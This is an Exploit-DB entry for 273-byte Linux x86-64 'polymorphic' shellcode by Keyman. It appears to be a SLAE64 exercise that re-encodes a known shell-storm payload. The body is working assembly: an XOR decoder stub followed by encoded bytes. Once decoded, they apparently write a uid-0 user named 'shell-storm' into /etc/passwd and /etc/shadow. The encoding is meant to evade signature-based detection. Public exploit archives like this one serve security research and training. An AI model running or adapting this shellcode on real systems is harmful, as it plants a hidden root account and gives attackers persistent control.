Linux/x64 - Add Root User (shell-storm/leet) + Polymorphic Shellcode (273 bytes)

EDB-ID:

43561

CVE:

N/A

EDB Verified:

Author:

Keyman

Type:

shellcode

Exploit:   /  

Platform:

Linux_x86-64

Date:

2014-09-21

Vulnerable App: 
; ===================================================================
; "Polymorphic" version of shellcode at:
; http://shell-storm.org/shellcode/files/shellcode-658.php
; Author: SLAE64-1351 (Keyman)
; Date: 21/09/2014
;
; Length: 273 bytes (got shorter by 117 bytes)
;
; The original code was optimized. This way it became 240 bytes long.
; Each byte of the optimized shellcode was XOR'ed with 0xDE. The
; result was dumped as the encoded shellcode below. A decoder stub
; was implemented to XOR each byte of "shellcode" with 0xDE. (except
; the first byte). After the decoding is finished execution is
; passed to the original (decoded) shellcode.
;
; ===================================================================
 
section .text
global _start
 
_start:
 
; -------------------------------------------------------------------
; Shellcode decoder stub
; -------------------------------------------------------------------
 
    push 1
    pop rcx
begin:
    cmp rcx, 1
    je begin_sc
    pop rdi                             ; rdi points to the shellcode
    push byte 0x78
    pop rcx
    add rcx, 0x77
decode:
    xor byte [rdi+rcx], 0xDE
    loop decode
    jmp shellcode
 
begin_sc:
    dec rcx
    call begin
 
; -------------------------------------------------------------------
; Encoded shellcode
; -------------------------------------------------------------------
 
shellcode:
    sc: db 0xEB, 0xBB, 0x81, 0x5E, 0xB1, 0xD5, 0x9F, 0x5E, 0xB1, 0xC6, 0x9F, 0xB4, 0xDC, 0x87, 0xB4, 0xDC, 0x86, 0x8E, 0x8E, 0x80, 0x84, 0xB8, 0x5F, 0x18, 0xD1, 0xDA, 0xB8, 0x5F, 0x1C, 0x5C, 0xDC, 0x8F, 0xD1, 0xDB, 0x87, 0x97, 0x49, 0x96, 0x5D, 0x19, 0xD3, 0x3C, 0x3D, 0x96, 0x21, 0x11, 0x89, 0x80, 0x8E, 0x81, 0xB4, 0xDC, 0x87, 0xB4, 0xF0, 0x9F, 0x80, 0xB4, 0xDF, 0x86, 0x9F, 0x88, 0x84, 0x8F, 0xD1, 0xDB, 0x87, 0x96, 0x5D, 0x18, 0xEE, 0x97, 0x59, 0x21, 0xB4, 0xE5, 0x9F, 0x80, 0x3C, 0x37, 0xB4, 0xDC, 0x87, 0xB4, 0xDD, 0x86, 0x8F, 0xD1, 0xDB, 0x87, 0x97, 0x59, 0x21, 0x3C, 0x2A, 0x96, 0xEF, 0x21, 0xB4, 0xE2, 0x86, 0xD1, 0xDB, 0x36, 0x48, 0x21, 0x21, 0x21, 0xF1, 0xBB, 0xAA, 0xBD, 0xF1, 0xAE, 0xBF, 0xAD, 0xAD, 0xA9, 0xBA, 0x9F, 0xF1, 0xF1, 0xBB, 0xAA, 0xBD, 0xF1, 0xAD, 0xB6, 0xBF, 0xBA, 0xB1, 0xA9, 0x9F, 0xAD, 0xB6, 0xBB, 0xB2, 0xB2, 0xF3, 0xAD, 0xAA, 0xB1, 0xAC, 0xB3, 0xE4, 0xA6, 0xE4, 0xEE, 0xE4, 0xEE, 0xE4, 0xAD, 0xB6, 0xBB, 0xB2, 0xB2, 0xF3, 0xAD, 0xAA, 0xB1, 0xAC, 0xB3, 0xF0, 0xB1, 0xAC, 0xB9, 0xE4, 0xF1, 0xE4, 0xF1, 0xBC, 0xB7, 0xB0, 0xF1, 0xBC, 0xBF, 0xAD, 0xB6, 0xD4, 0xAD, 0xB6, 0xAD, 0xB6, 0xBB, 0xB2, 0xB2, 0xF3, 0xAD, 0xAA, 0xB1, 0xAC, 0xB3, 0xE4, 0xFA, 0xEF, 0xFA, 0xAC, 0xBB, 0x89, 0x9B, 0xE9, 0x99, 0x93, 0xEF, 0xFA, 0xBF, 0xA6, 0xBB, 0x93, 0xB9, 0xE8, 0x92, 0x8A, 0xAD, 0xF1, 0x8E, 0xBA, 0x8D, 0xB9, 0xBD, 0x98, 0x84, 0xEE, 0x8B, 0xED, 0x93, 0xF1, 0xE4, 0xEF, 0xEA, 0xE9, 0xE9, 0xE6, 0xE4, 0xE4, 0xE4, 0xE4, 0xE4, 0xE4, 0xD4
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services